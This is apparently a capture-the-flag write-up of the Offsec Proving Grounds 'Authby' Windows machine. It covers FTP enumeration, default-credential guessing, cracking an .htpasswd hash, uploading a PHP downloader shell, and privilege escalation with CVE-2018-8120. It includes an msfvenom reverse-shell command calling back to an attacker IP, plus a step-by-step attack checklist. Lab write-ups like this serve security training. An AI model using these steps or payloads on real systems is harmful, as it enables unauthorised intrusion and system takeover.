Authby | Write-Up

Summary

Authby, an Intermediate-rated machine, is a Windows box with an open FTP share used to enumerate users, upload a reverse shell using cURL  with various parameters, and escalate privileges with a kernel exploit of your choice.


Enumeration

The initial nmap scan shows the machine is relatively locked down, with FTP and some other HTTP ports open. As an aside, I've really been digging how realistic the Offsec Proving Grounds machines are, so starting with full port scans and disabling ping tests has become pretty standard. Here's the output nmap:

Nmap 7.92 scan initiated Sat Dec 18 16:42:05 2021 as: nmap -sC -sV -p- -Pn -oN authby.nmap 192.168.52.46
Nmap scan report for authby (192.168.52.46)
Host is up (0.00049s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE            VERSION
21/tcp   open  ftp                zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 9680
| ----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe
| ----------   1 root     root           25 Feb 10  2011 UninstallService.bat
| ----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe
| ----------   1 root     root           17 Aug 13  2011 StopService.bat
| ----------   1 root     root           18 Aug 13  2011 StartService.bat
| ----------   1 root     root         8736 Nov 09  2011 Settings.ini
| dr-xr-xr-x   1 root     root          512 Dec 19 05:42 log
| ----------   1 root     root         2275 Aug 09  2011 LICENSE.htm
| ----------   1 root     root           23 Feb 10  2011 InstallService.bat
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates
|_dr-xr-xr-x   1 root     root          512 Sep 22 02:21 accounts
242/tcp  open  http               Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
|_http-title: 401 Authorization Required
| http-auth: 
| HTTP/1.1 401 Authorization Required\x0D
|_  Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
3145/tcp open  zftp-admin         zFTPServer admin
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: LIVDA
|   NetBIOS_Domain_Name: LIVDA
|   NetBIOS_Computer_Name: LIVDA
|   DNS_Domain_Name: LIVDA
|   DNS_Computer_Name: LIVDA
|   Product_Version: 6.0.6001
|_  System_Time: 2021-12-18T21:44:06+00:00
|_ssl-date: 2021-12-18T21:44:11+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=LIVDA
| Not valid before: 2021-09-20T18:21:50
|_Not valid after:  2022-03-22T18:21:50
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Starting with FTP, we've gotten a fair amount of files we can access, but none of them seem to be that juicy. The only information we can glean from this are some .uac files indicating other FTP users on the machine, offsec, admin, and the account we're using, anonymous. A quick guess at some default credentials in another FTP session reveals the admin user's password is admin. Very nice. In this new session, we find two juicy files: .htaccess and .htpasswd.

Well that's definitely promising. We can use john, coupled with rockyou.txt, to make some quick use of this hash and get a new credential set.

These credentials don't work over FTP, so let's check some of the other ports on the machine. Checking HTTP port 242 requires some credentials and voila, we're in.

But there's not much to look at. Let's take another look at the .htaccess file. There's a file path of c:\wamp\www that shows where the root web directory is running.

Foothold

Ok, so let's break this foothold path down. It's not complicated, but took me a little thinking and putting my beer down for a minute or two to clear it in my mind:

  1. We can't just upload a php-reverse-shell because it's a Windows box. So we have to use a "jump" script to download a file from our machine.
  2. That file needs to be a reverse shell
  3. ???
  4. Profit.

I did some scouring and found a Base64-encoded PHP shell that grabs a remote file and executes it. Let's make some basic tweaks to the IP, Port, and the directory path to match what we found from .htaccess. We can then start a python server running locally on port 80 and another reverse shell on port 242 in hopes to catch the reverse shell.

curl -u offsec:elite "http://192.168.52.46:242/rev.php"
**curl: (1) Received HTTP/0.9 when not allowed**

Welp, that's odd, but some quick googling shows that it can be an issue with compatibility with FTP shares served on the web. Thankfully, cURL has a native command to deal with that, so let's add it and try again:

Privilege Escalation

Now that we're on the machine, we can run some enumeration to see what we can notice. On first check, we see it's a standard 2008 Server with no patches/hotfixes applied. SWEEEEET. There are a TON of exploits you could use at this point, but let's try CVE-2018-8120, a Win32k Elevation of Privilege Vulnerability, that has a public exploit code in a MASSIVE repository for CVE's. There's plenty of avenues you could take to exploit this machine given that it's a flat 2008 Server, so pick your poison.

Since this exploit runs locally, we can download the correct version to match the architecture. We'll also need another shell to catch back to oursevles, so using msfvenom, we can create one:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.52.200 LPORT=1234 -f exe > privesc.exe

Upload this via FTP, along with the exploit, open a netcat listener, run your exploit with the newly uploaded shell, and boom goes the dynamite.


GOTTA GO FAST

  1. FTP to machine with anonymous for initial access.
  2. Verify additional user accounts (offsec, administrator).
  3. Re-attempt/brute-froce FTP for creds of admin:admin.
  4. Find hashed credentials for offsec user in .htpasswd.
  5. Log into authby:242 with creds.
  6. Download PHP Windows reverse shell, along with msfvenom shell.
  7. Run systeminfo to verify list/lack of KB's applied.
  8. Upload privileged reverse shell and CVE-2018-8120 (https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120).
  9. Catch reverse shell.